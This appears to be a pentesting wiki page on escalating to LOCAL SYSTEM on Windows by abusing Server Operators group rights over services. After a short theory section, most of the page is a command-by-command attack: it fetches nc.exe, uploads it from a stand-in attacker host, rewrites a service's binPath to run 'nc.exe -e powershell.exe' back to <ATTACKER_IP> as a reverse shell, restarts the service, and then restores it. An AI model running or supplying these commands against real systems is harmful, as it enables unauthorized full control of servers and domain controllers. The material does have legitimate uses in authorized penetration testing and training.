PRIMARY CATEGORY → WINDOWS PRIVESC • SECURITY GROUPS
Theory
The Server Operators group is an Active Directory Security Group and one of the so-called Privileged Groups
The main purpose of this group is to let certain users perform a subset of administrative tasks without making them members of the Administrators group or Domain Admins
Among the privileges enjoyed by members of this group, the following stand out
- Start, Stop and Restart Services (SERVICE_ALL_ACCESS)
- Shutting down and Switching On Servers, including DCs
- Manage Shared Resources
- Backup and Restore Files in the Domain Controller
- Remote Access to the Domain Controller through Administration Tools
Default Privileges
SeInteractiveLogonRight # DC Login
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
Enumeration
Listing the Groups to which the Current User belongs
whoami /groups
net user <USER>
Members of Server Operators
net localgroup "Server Operators"
Code Execution as LOCAL SYSTEM
Workflow
As mentioned, a domain user account that is a member of this group is able to manage local services, since it is granted the SERVICE_ALL_ACCESS right over them
Therefore, if we compromise a principal that belongs to the Server Operators group, we can use that domain user account to replace the Binary Path of a local service running as LOCAL SYSTEM with a malicious payload
Then we restart the service and it is over: we gain code execution as LOCAL SYSTEM
Requirements
- The compromised principal must belong to the Server Operators group
- The Server Operators group must have the SERVICE_ALL_ACCESS right (SERVICE_CHANGE_CONFIG and SERVICE_START specifically) over a local service that runs as LOCAL SYSTEM
Abuse - Windows
Checking Group Membership
Once a shell is obtained on the Remote Host as a non-privileged user, simply check whether the current user belongs to the Server Operators Group
whoami /groups | findstr /I 'Server Operators'
If not, check which domain users belong to this group and try to pivot to one of them
Get-ADGroupMember -Identity "Server Operators"
net group /domain "Server Operators"
Identifying a Local Service running as LOCAL SYSTEM
If Evil-WinRM is used to establish a connection to the target via WinRM, use the following tool-specific command to list the running services and the path of their associated binary
services
If not →
CMD & PS
Get-CimInstance win32_service -Filter 'StartName = "localsystem"' | Select Name, PathName
Choose a non-critical service and modify its binary path to the path of the malicious binary we will upload
Retrieving Information about the given service
CMD & PS
sc.exe qc '<SERVICE_NAME>'
PS
Get-CimInstance -ClassName win32_service -Filter 'Name="<SERVICE_NAME>"' -Property *
Checking the current DACL of the service binary
CMD & PS
icacls '<BIN_PATH>'
PS
Get-ACL -Path '<BIN_PATH>' | Select -ExpandProperty AccessToString
Malicious Binary Setup
- Downloading the binary
From the attacker ⚔️
curl --silent --location --request GET --output 'nc.exe' 'https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe'
- Transferring it to the target
From the attacker ⚔️
python3 -m http.server 80
From the target 🎯
mkdir C:\Windows\Temp\LPE
cd C:\Windows\Temp\LPE
IWR -UseBasicParsing -Uri 'http://<ATTACKER_IP>/nc.exe' -OutFile 'C:\Windows\Temp\LPE\nc.exe'
Modifying the Binary Path of the Service
Modify the default binary path of the service to that of nc.exe, passing it the following arguments to send a reverse shell to the attacker machine
sc.exe config <SERVICE> binPath="C:\Windows\Temp\LPE\nc.exe -e powershell.exe <ATTACKER_IP> <ATTACKER_PORT>"
Setting up a TCP Listener
From the attacker ⚔️
rlwrap -CaR nc -nlvp <PORT>
Restarting the service
Once the binary path of the service has been modified, and with the TCP listener already running on the attacker machine, simply restart the service
sc.exe stop <SERVICE>
sc.exe start <SERVICE>
Cleanup - Windows
Bin Path Restoration
sc.exe config <SERVICE> binPath="<LEGITIMATE_BIN_PATH>"
Service Restart
If the service was stopped before the abuse, only stop it and do not start it again; otherwise restart it
sc.exe stop <SERVICE>
sc.exe start <SERVICE>